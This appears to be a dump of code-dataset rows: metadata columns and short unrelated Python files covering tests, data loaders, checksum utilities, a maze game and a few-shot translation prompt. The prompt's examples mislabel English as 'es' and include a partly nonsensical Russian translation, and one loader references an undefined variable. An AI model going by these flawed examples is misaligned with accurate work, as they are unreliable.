| 30.529412 | 72 | 0.745665 | 76 | 519 | 4.907895 | 0.473684 | 0.085791 | 0.128686 | 0.080429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004494 | 0.142582 | 519 | 16 | 73 | 32.4375 | 0.833708 | 0 | 0 | 0 | 0 | 0 | 0.046243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.416667 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
390dcff9eeeb910ef17bc178dc5eea38e986422e | 453 | py | Python | leetcode/longest_increasing_subsequence/longest_increasing_subsequence_test.py | sagasu/python-algorithms | d630777a3f17823165e4d72ab780ede7b10df752 | [
"MIT"
] | null | null | null | leetcode/longest_increasing_subsequence/longest_increasing_subsequence_test.py | sagasu/python-algorithms | d630777a3f17823165e4d72ab780ede7b10df752 | [
"MIT"
] | null | null | null | leetcode/longest_increasing_subsequence/longest_increasing_subsequence_test.py | sagasu/python-algorithms | d630777a3f17823165e4d72ab780ede7b10df752 | [
"MIT"
] | null | null | null | import unittest
import longest_increasing_subsequence
class Solution(unittest.TestCase):
def test_one(self):
sr = longest_increasing_subsequence.Solution()
self.assertEqual(sr.lengthOfLIS([10,9,2,5,3,7,101,18]), 4)
# def test_two(self):
# sr = longest_increasing_subsequence.Solution()
# self.assertEqual(sr.lengthOfLIS([0,2,3,4,6,8,9]), ["0","2->4","6","8->9"])
if __name__ == '__main__':
unittest.main() | 30.2 | 84 | 0.664459 | 63 | 453 | 4.52381 | 0.492063 | 0.178947 | 0.294737 | 0.161404 | 0.491228 | 0.491228 | 0.491228 | 0.491228 | 0.491228 | 0.491228 | 0 | 0.068783 | 0.165563 | 453 | 15 | 85 | 30.2 | 0.685185 | 0.328918 | 0 | 0 | 0 | 0 | 0.026578 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
392373959dae05b7051126f3234a23ca69f13125 | 383 | py | Python | tests/test_mongodb2.py | mannuan/dspider | bf1bbad375b3b61f800cb25d1c839659a66f3e12 | [
"Apache-2.0"
] | 15 | 2018-05-12T17:15:59.000Z | 2020-09-06T04:32:47.000Z | tests/test_mongodb2.py | mannuan/dspider | bf1bbad375b3b61f800cb25d1c839659a66f3e12 | [
"Apache-2.0"
] | null | null | null | tests/test_mongodb2.py | mannuan/dspider | bf1bbad375b3b61f800cb25d1c839659a66f3e12 | [
"Apache-2.0"
] | 2 | 2018-06-29T00:44:52.000Z | 2020-07-07T01:58:03.000Z | from pymongo import MongoClient
from pymongo.database import Database
from pymongo.collection import Collection
shop_collection = Collection(Database(MongoClient(host='10.1.17.15'), 'dspider2'), 'shops')
for i in shop_collection.find({'data_source':'餐饮', 'data_region':'千岛湖', 'data_website':'大众点评', 'shop_url':'http://www.dianping.com/shop/66205575'}):
print(i.get('shop_time')) | 54.714286 | 148 | 0.75718 | 54 | 383 | 5.240741 | 0.62963 | 0.116608 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045198 | 0.075718 | 383 | 7 | 149 | 54.714286 | 0.754237 | 0 | 0 | 0 | 0 | 0 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
39377de863e650c1264040afbd97357846b6a236 | 247 | py | Python | answers/Anuraj Pariya/day 18/question 1.py | justshivam/30-DaysOfCode-March-2021 | 64d434c07b9ec875384dee681a3eecefab3ddef0 | [
"MIT"
] | 22 | 2021-03-16T14:07:47.000Z | 2021-08-13T08:52:50.000Z | answers/Anuraj Pariya/day 18/question 1.py | AnurajPariya03/30-DaysOfCode-March-2021 | 2fb575d06a3c86bc890e7fb97d321eba8f93157f | [
"MIT"
] | 174 | 2021-03-16T21:16:40.000Z | 2021-06-12T05:19:51.000Z | answers/Anuraj Pariya/day 18/question 1.py | AnurajPariya03/30-DaysOfCode-March-2021 | 2fb575d06a3c86bc890e7fb97d321eba8f93157f | [
"MIT"
] | 135 | 2021-03-16T16:47:12.000Z | 2021-06-27T14:22:38.000Z | def perfect_square(x):
if (x == 0 or x == 1):
return x
i = 1
result = 1
while (result <= x):
i += 1
result = i * i
return i - 1
x = int(input('Enter no.'))
print(perfect_square(x))
| 15.4375 | 27 | 0.437247 | 36 | 247 | 2.944444 | 0.472222 | 0.056604 | 0.264151 | 0.169811 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042254 | 0.425101 | 247 | 15 | 28 | 16.466667 | 0.704225 | 0 | 0 | 0 | 0 | 0 | 0.036437 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0 | 0 | 0.272727 | 0.090909 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3939463bd0f07c5f73d7be7ea0d782b5a2f136d8 | 1,383 | py | Python | managesf/services/nodepool/common.py | enovance/managesf | 5f6bc6857ebbffb929a063ccc3ab94317fa3784a | [
"Apache-2.0"
] | null | null | null | managesf/services/nodepool/common.py | enovance/managesf | 5f6bc6857ebbffb929a063ccc3ab94317fa3784a | [
"Apache-2.0"
] | null | null | null | managesf/services/nodepool/common.py | enovance/managesf | 5f6bc6857ebbffb929a063ccc3ab94317fa3784a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Copyright (C) 2016 Red Hat <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
INPUT_FORMAT = re.compile("^[a-zA-Z0-9_-]+$", re.U)
def get_values(line):
return [u.strip() for u in line.split('|') if u.strip() != '']
def get_age(age):
days, hours, minutes, sec = age.split(':')
return (((int(days) * 24) + int(hours))*60 + int(minutes))*60 + int(sec)
def validate_input(input):
return INPUT_FORMAT.match(input)
def validate_ssh_key(public_key):
try:
key_type, key, comment = public_key.split()
if key_type not in ("ssh-rsa", "ssh-ecdsa", "ssh-ed25519"):
raise ValueError("Invalid key type")
if not re.match("^[A-Za-z0-9+/]+[=]{0,3}$", key):
raise ValueError("Invalid key data")
except ValueError:
raise ValueError("Invalid public key")
| 30.065217 | 76 | 0.670282 | 209 | 1,383 | 4.37799 | 0.535885 | 0.065574 | 0.072131 | 0.034973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022462 | 0.195228 | 1,383 | 45 | 77 | 30.733333 | 0.799641 | 0.430224 | 0 | 0 | 0 | 0 | 0.153946 | 0.031048 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.055556 | 0.111111 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
393b93af5c514b1526b31d876323699fbb60feaf | 748 | py | Python | tests/kv_testdata.py | umerazad/precs | 76bbc6b1c5fe2f53fe5790d026dc2a83c8960d3d | [
"0BSD"
] | null | null | null | tests/kv_testdata.py | umerazad/precs | 76bbc6b1c5fe2f53fe5790d026dc2a83c8960d3d | [
"0BSD"
] | null | null | null | tests/kv_testdata.py | umerazad/precs | 76bbc6b1c5fe2f53fe5790d026dc2a83c8960d3d | [
"0BSD"
] | null | null | null | # Default delimiters
INPUT1 = '''
pid 2
uptime 675
version 1.2.5 END
pid 1
uptime 2
version 3
END
'''
OUTPUT1 = '''{"pid": "2", "uptime": "675", "version": "1.2.5"}
{"pid": "1", "uptime": "2", "version": "3"}
'''
# --field-delim '=', --record-delim '%\n'
INPUT2 = '''
a=1
b=2
c=3
%
d=4
e=5
f=6
%
'''
OUTPUT2 = '''{"a": "1", "b": "2", "c": "3"}
{"d": "4", "e": "5", "f": "6"}
'''
# --field-delim '=', --entry-delim '|' --record-delim '%\n'
INPUT3 = '''
a=1|b=2|c=3%
d=4|e=5|f=6%
'''
OUTPUT3 = '''{"a": "1", "b": "2", "c": "3"}
{"d": "4", "e": "5", "f": "6"}
'''
# --field-delim '=', --entry-delim '|' --record-delim '%'
INPUT4 = '''
a=1|b=2|c=3%d=4|e=5|f=6%
'''
OUTPUT4 = '''{"a": "1", "b": "2", "c": "3"}
{"d": "4", "e": "5", "f": "6"}
'''
| 14.666667 | 62 | 0.42246 | 130 | 748 | 2.430769 | 0.246154 | 0.037975 | 0.056962 | 0.075949 | 0.689873 | 0.689873 | 0.56962 | 0.56962 | 0.424051 | 0.424051 | 0 | 0.103728 | 0.175134 | 748 | 50 | 63 | 14.96 | 0.408428 | 0.229947 | 0 | 0.289474 | 0 | 0.052632 | 0.749123 | 0.042105 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
39526d9c160599ac5932ecb9465bcdc3176c4e72 | 128 | py | Python | csv2sql/meta.py | ymoch/csv2sql | 22e20c1ccb7a5b21bacec6bd94b72d3c2e06bb4a | [
"MIT"
] | 7 | 2017-03-07T03:05:12.000Z | 2021-03-19T17:12:46.000Z | csv2sql/meta.py | ymoch/csv2sql | 22e20c1ccb7a5b21bacec6bd94b72d3c2e06bb4a | [
"MIT"
] | 15 | 2017-02-06T17:11:01.000Z | 2018-08-18T02:55:17.000Z | csv2sql/meta.py | ymoch/csv2sql | 22e20c1ccb7a5b21bacec6bd94b72d3c2e06bb4a | [
"MIT"
] | 5 | 2017-02-05T18:20:00.000Z | 2021-11-14T20:20:42.000Z | """Meta information for csv2sql."""
__version__ = '0.4.1'
__author__ = 'Yu Mochizuki'
__author_email__ = 'ymoch.dev@gmail.com'
| 21.333333 | 40 | 0.71875 | 17 | 128 | 4.647059 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035398 | 0.117188 | 128 | 5 | 41 | 25.6 | 0.663717 | 0.226563 | 0 | 0 | 0 | 0 | 0.387097 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1a4105ad71311c7d4ce3c72af3483de90d72f0ab | 1,877 | py | Python | MDGM/Channel/load_data.py | xiayzh/MH-MDGM | 203fb463ac968d1c566073111ff42ca55e7ea085 | [
"MIT"
] | 1 | 2021-07-22T06:10:08.000Z | 2021-07-22T06:10:08.000Z | MDGM/Channel/load_data.py | xiayzh/MH-MDGM | 203fb463ac968d1c566073111ff42ca55e7ea085 | [
"MIT"
] | null | null | null | MDGM/Channel/load_data.py | xiayzh/MH-MDGM | 203fb463ac968d1c566073111ff42ca55e7ea085 | [
"MIT"
] | 2 | 2021-07-15T08:18:32.000Z | 2022-03-28T20:56:28.000Z | import torch
from torch.utils.data import DataLoader, TensorDataset
from argparse import Namespace
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import numpy as np
import h5py
import json
import os
def load_data_1scale(hdf5_file, ndata, batch_size, singlescale=True):
with h5py.File(hdf5_file, 'r') as f:
x_data = f['train'][:ndata]
data_tuple = (torch.FloatTensor(x_data), ) if singlescale else (
torch.FloatTensor(x_data), torch.FloatTensor(y_data))
data_loader = DataLoader(TensorDataset(*data_tuple),
batch_size=batch_size, shuffle=True, drop_last=True)
return data_loader
def load_data_2scales(hdf5_file,hdf5_file1, ndata, batch_size, singlescale=False):
with h5py.File(hdf5_file, 'r') as f:
x2_data = f['train'][:ndata]
with h5py.File(hdf5_file1, 'r') as f:
x1_data = f['train'][:ndata]
data_tuple = (torch.FloatTensor(x_data), ) if singlescale else (
torch.FloatTensor(x2_data), torch.FloatTensor(x1_data))
data_loader = DataLoader(TensorDataset(*data_tuple),
batch_size=batch_size, shuffle=True, drop_last=True)
print(f'Loaded dataset: {hdf5_file}')
return data_loader
def load_data_3scales(hdf5_file,hdf5_file1,hdf5_file2, ndata, batch_size, singlescale=False):
with h5py.File(hdf5_file, 'r') as f:
x3_data = f['train'][:ndata]
with h5py.File(hdf5_file1, 'r') as f:
x2_data = f['train'][:ndata]
with h5py.File(hdf5_file2, 'r') as f:
x1_data = f['train'][:ndata]
data_tuple = (torch.FloatTensor(x_data), ) if singlescale else (
torch.FloatTensor(x3_data), torch.FloatTensor(x2_data),torch.FloatTensor(x1_data))
data_loader = DataLoader(TensorDataset(*data_tuple),
batch_size=batch_size, shuffle=True, drop_last=True)
return data_loader
| 32.929825 | 94 | 0.69366 | 265 | 1,877 | 4.690566 | 0.207547 | 0.128721 | 0.057924 | 0.077233 | 0.711183 | 0.711183 | 0.680611 | 0.680611 | 0.661303 | 0.661303 | 0 | 0.025726 | 0.192328 | 1,877 | 56 | 95 | 33.517857 | 0.794195 | 0 | 0 | 0.525 | 0 | 0 | 0.0336 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0 | 0.225 | 0 | 0.375 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1a54b918c75b8f6851f014b049727a99f83a5fe1 | 925 | py | Python | display_functions.py | JackGartner/MazeGame | cd055f7cb17cc25f0eb20b1adb747b710ca9f9bf | [
"MIT"
] | null | null | null | display_functions.py | JackGartner/MazeGame | cd055f7cb17cc25f0eb20b1adb747b710ca9f9bf | [
"MIT"
] | null | null | null | display_functions.py | JackGartner/MazeGame | cd055f7cb17cc25f0eb20b1adb747b710ca9f9bf | [
"MIT"
] | null | null | null | ############# constants
TITLE = "Cheese Maze"
DEVELOPER = "Jack Gartner"
HISTORY = "A mouse wants eat his cheese, Make it to the Hashtag to win, watch out for plus signs, $ is a teleport, P is a power up, Obtain the Key (K) in order to unlock the door (D)"
INSTRUCTIONS = "left arrow key\t\t\tto move left\nright arrow key\t\t\tto move right\nup arrow key\t\t\tto move up\ndown arrow key\t\t\tto move down\npress q\t\t\t\t\tto quit"
############# functions
def displayTitle():
print(TITLE)
print("By " + DEVELOPER)
print()
print(HISTORY)
print()
print(INSTRUCTIONS)
print()
def displayBoard():
print("-----------------")
print("| +\033[36mK\033[37m + \033[33mP\033[37m|")
print("|\033[32m#\033[37m \033[31mD\033[37m + |")
print("|++++ ++++++ |")
print("| + |")
print("| ++++++ +++++|")
print("| \033[34m$\033[37m|")
print("-----------------")
| 31.896552 | 183 | 0.56 | 131 | 925 | 3.954198 | 0.48855 | 0.027027 | 0.048263 | 0.07722 | 0.131274 | 0.131274 | 0 | 0 | 0 | 0 | 0 | 0.068027 | 0.205405 | 925 | 28 | 184 | 33.035714 | 0.636735 | 0.020541 | 0 | 0.238095 | 0 | 0.095238 | 0.650342 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0 | 0 | 0.095238 | 0.714286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
1a639776c741dfa1f4d1cbf2f51170beef3a28d8 | 1,537 | py | Python | concrete/common/debugging/custom_assert.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 96 | 2022-01-12T15:07:50.000Z | 2022-03-16T04:00:09.000Z | concrete/common/debugging/custom_assert.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 10 | 2022-02-04T16:26:37.000Z | 2022-03-25T14:08:01.000Z | concrete/common/debugging/custom_assert.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 8 | 2022-01-12T15:07:55.000Z | 2022-03-05T00:46:16.000Z | """Provide some variants of assert."""
def _custom_assert(condition: bool, on_error_msg: str = "") -> None:
"""Provide a custom assert which is kept even if the optimized python mode is used.
See https://docs.python.org/3/reference/simple_stmts.html#assert for the documentation
on the classical assert function
Args:
condition(bool): the condition. If False, raise AssertionError
on_error_msg(str): optional message for precising the error, in case of error
"""
if not condition:
raise AssertionError(on_error_msg)
def assert_true(condition: bool, on_error_msg: str = ""):
"""Provide a custom assert to check that the condition is True.
Args:
condition(bool): the condition. If False, raise AssertionError
on_error_msg(str): optional message for precising the error, in case of error
"""
return _custom_assert(condition, on_error_msg)
def assert_false(condition: bool, on_error_msg: str = ""):
"""Provide a custom assert to check that the condition is False.
Args:
condition(bool): the condition. If True, raise AssertionError
on_error_msg(str): optional message for precising the error, in case of error
"""
return _custom_assert(not condition, on_error_msg)
def assert_not_reached(on_error_msg: str):
"""Provide a custom assert to check that a piece of code is never reached.
Args:
on_error_msg(str): message for precising the error
"""
return _custom_assert(False, on_error_msg)
| 30.74 | 90 | 0.70527 | 220 | 1,537 | 4.759091 | 0.259091 | 0.080229 | 0.114613 | 0.099331 | 0.680038 | 0.617956 | 0.510029 | 0.510029 | 0.510029 | 0.510029 | 0 | 0.000828 | 0.214053 | 1,537 | 49 | 91 | 31.367347 | 0.865894 | 0.623292 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.888889 | 1 | 0.444444 | false | 0 | 0 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1a69e9ece626680008e91494fee44dc21b018bc4 | 501 | py | Python | third_party/gsutil/third_party/rsa/tests/test_parallel.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | third_party/gsutil/third_party/rsa/tests/test_parallel.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | third_party/gsutil/third_party/rsa/tests/test_parallel.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | """Test for multiprocess prime generation."""
import unittest
import rsa.prime
import rsa.parallel
import rsa.common
class ParallelTest(unittest.TestCase):
"""Tests for multiprocess prime generation."""
def test_parallel_primegen(self):
p = rsa.parallel.getprime(1024, 3)
self.assertFalse(rsa.prime.is_prime(p - 1))
self.assertTrue(rsa.prime.is_prime(p))
self.assertFalse(rsa.prime.is_prime(p + 1))
self.assertEqual(1024, rsa.common.bit_size(p))
| 23.857143 | 54 | 0.698603 | 67 | 501 | 5.134328 | 0.41791 | 0.093023 | 0.087209 | 0.130814 | 0.255814 | 0.209302 | 0.209302 | 0.209302 | 0.209302 | 0 | 0 | 0.026764 | 0.179641 | 501 | 20 | 55 | 25.05 | 0.810219 | 0.159681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.363636 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1a6a4976a069bdb461e9c492db9b0df3067479e6 | 1,906 | py | Python | downloadutil/checksum_util.py | yugabyte/downloadutil | 231c472b60e78ef3033b9e90d5e7b4231f64e228 | [
"Apache-2.0"
] | 2 | 2021-04-06T00:49:03.000Z | 2021-04-06T17:44:04.000Z | downloadutil/checksum_util.py | mbautin/downloadutil | 19995e08c03ac267ba0e6f9b4724a12df247f79a | [
"Apache-2.0"
] | null | null | null | downloadutil/checksum_util.py | mbautin/downloadutil | 19995e08c03ac267ba0e6f9b4724a12df247f79a | [
"Apache-2.0"
] | 1 | 2021-04-19T20:16:42.000Z | 2021-04-19T20:16:42.000Z | import os
from downloadutil.util import BUFFER_SIZE_BYTES
from typing import Any
import re
import hashlib
SHA256_CHECKSUM_RE = re.compile(r'^[0-9a-f]{64}$')
SHA256_CHECKSUM_FILE_SUFFIX = '.sha256'
def validate_sha256sum(checksum_str: str) -> None:
"""
Validtes the given SHA256 checksum. Raises an exception if it is invalid.
"""
if not SHA256_CHECKSUM_RE.match(checksum_str):
raise ValueError(
"Invalid SHA256 checksum: '%s', expected 64 hex characters" % checksum_str)
def update_hash_with_file(hash: Any, filename: str, block_size: int = BUFFER_SIZE_BYTES) -> str:
"""
Compute the hash sun of a file by updating the existing hash object.
"""
# TODO: use a more precise argument type for hash.
with open(filename, "rb") as f:
for block in iter(lambda: f.read(block_size), b""):
hash.update(block)
return hash.hexdigest()
def compute_file_sha256(path: str) -> str:
return update_hash_with_file(hashlib.sha256(), path)
def compute_string_sha256(s: str) -> str:
hash = hashlib.sha256()
hash.update(s.encode('utf-8'))
return hash.hexdigest()
def parse_sha256_from_file(checksum_file_contents: str) -> str:
sha256_from_file = checksum_file_contents.strip().split()[0]
validate_sha256sum(sha256_from_file)
return sha256_from_file
def read_sha256_from_file(checksum_file_path: str) -> str:
with open(checksum_file_path) as checksum_file:
return parse_sha256_from_file(checksum_file.readline())
def get_sha256_file_path_or_url(original_path_or_url: str) -> str:
if original_path_or_url.endswith(SHA256_CHECKSUM_FILE_SUFFIX):
raise ValueError(
f"File path or URL already ends with {SHA256_CHECKSUM_FILE_SUFFIX}: "
f"{original_path_or_url}, will not add the same suffix again.")
return original_path_or_url + SHA256_CHECKSUM_FILE_SUFFIX
| 31.766667 | 96 | 0.721406 | 277 | 1,906 | 4.6787 | 0.350181 | 0.092593 | 0.064815 | 0.074074 | 0.100309 | 0.080247 | 0 | 0 | 0 | 0 | 0 | 0.047619 | 0.18468 | 1,906 | 59 | 97 | 32.305085 | 0.786358 | 0.100735 | 0 | 0.114286 | 0 | 0 | 0.124777 | 0.031491 | 0 | 0 | 0 | 0.016949 | 0 | 1 | 0.2 | false | 0 | 0.142857 | 0.028571 | 0.514286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1a7d2fcf53ebdeb2535adbc73a4ba527aae98102 | 851 | py | Python | matilda/data_pipeline/data_scapers/__init__.py | AlainDaccache/Quantropy | 6cfa06ed2b764471382ebf94d40af867f10433bb | [
"MIT"
] | 45 | 2021-01-28T04:12:21.000Z | 2022-02-24T13:15:50.000Z | matilda/data_pipeline/data_scapers/__init__.py | AlainDaccache/Quantropy | 6cfa06ed2b764471382ebf94d40af867f10433bb | [
"MIT"
] | 32 | 2021-03-02T18:45:16.000Z | 2022-03-12T00:53:10.000Z | matilda/data_pipeline/data_scapers/__init__.py | AlainDaccache/Quantropy | 6cfa06ed2b764471382ebf94d40af867f10433bb | [
"MIT"
] | 10 | 2020-12-25T15:02:40.000Z | 2021-12-30T11:40:15.000Z | import os
from matilda import config
if not os.path.exists(config.DATA_DIR_PATH):
os.mkdir(config.DATA_DIR_PATH)
if not os.path.exists(config.STOCK_PRICES_DIR_PATH):
os.mkdir(config.STOCK_PRICES_DIR_PATH)
if not os.path.exists(config.FINANCIAL_STATEMENTS_DIR_PATH):
os.mkdir(config.FINANCIAL_STATEMENTS_DIR_PATH)
if not os.path.exists(config.FACTORS_DIR_PATH):
os.mkdir(config.FACTORS_DIR_PATH)
if not os.path.exists(os.path.join(config.FACTORS_DIR_PATH, 'pickle')):
os.mkdir(os.path.join(config.FACTORS_DIR_PATH, 'pickle'))
if not os.path.exists(config.MARKET_DATA_DIR_PATH):
os.mkdir(config.MARKET_DATA_DIR_PATH)
if not os.path.exists(config.MARKET_EXCHANGES_DIR_PATH):
os.mkdir(config.MARKET_EXCHANGES_DIR_PATH)
if not os.path.exists(config.MARKET_INDICES_DIR_PATH):
os.mkdir(config.MARKET_INDICES_DIR_PATH)
| 31.518519 | 71 | 0.795535 | 144 | 851 | 4.409722 | 0.152778 | 0.176378 | 0.088189 | 0.138583 | 0.91811 | 0.667717 | 0.464567 | 0.381102 | 0.173228 | 0 | 0 | 0 | 0.094007 | 851 | 26 | 72 | 32.730769 | 0.823606 | 0 | 0 | 0 | 0 | 0 | 0.014101 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1a9a8e80bd2521574b1116072fe9325844dc32a0 | 1,928 | py | Python | argostranslate/fewshot.py | argosopentechnologies/Argos-Translate | c834ef224418a830abe8ca4ed4e942f4ea07cbca | [
"MIT"
] | 1,114 | 2020-08-29T20:52:50.000Z | 2022-03-30T06:06:52.000Z | argostranslate/fewshot.py | argosopentechnologies/Argos-Translate | c834ef224418a830abe8ca4ed4e942f4ea07cbca | [
"MIT"
] | 145 | 2020-11-27T18:45:29.000Z | 2022-03-22T06:30:13.000Z | argostranslate/fewshot.py | argosopentechnologies/Argos-Translate | c834ef224418a830abe8ca4ed4e942f4ea07cbca | [
"MIT"
] | 85 | 2020-10-27T18:56:27.000Z | 2022-03-28T08:14:58.000Z | prompt = """Translate to French (fr)
From English (es)
==========
Bramshott is a village with mediaeval origins in the East Hampshire district of Hampshire, England. It lies 0.9 miles (1.4 km) north of Liphook. The nearest railway station, Liphook, is 1.3 miles (2.1 km) south of the village.
----------
Bramshott est un village avec des origines médiévales dans le quartier East Hampshire de Hampshire, en Angleterre. Il se trouve à 0,9 miles (1,4 km) au nord de Liphook. La gare la plus proche, Liphook, est à 1,3 km (2,1 km) au sud du village.
==========
Translate to Russian (rs)
From German (de)
==========
Der Gewöhnliche Strandhafer (Ammophila arenaria (L.) Link; Syn: Calamagrostis arenaria (L.) Roth) – auch als Gemeiner Strandhafer, Sandrohr, Sandhalm, Seehafer oder Helm (niederdeutsch) bezeichnet – ist eine zur Familie der Süßgräser (Poaceae) gehörige Pionierpflanze.
----------
Обычная пляжная овсянка (аммофила ареалия (л.) соединение; сина: каламагростисная анария (л.) Рот, также называемая обычной пляжной овцой, песчаной, сандалмой, морской орой или шлемом (нижний немецкий) - это кукольная станция, принадлежащая семье сладких трав (поа).
==========
"""
def generate_prompt(text, from_name, from_code, to_name, to_code):
# TODO: document
to_return = prompt
to_return += "Translate to "
if from_name:
to_return += from_name
if from_code:
to_return += " (" + from_code + ")"
to_return += "\nFrom "
if to_name:
to_return += to_name
if from_code:
to_return += " (" + to_code + ")"
to_return += "\n" + "=" * 10 + "\n"
to_return += text
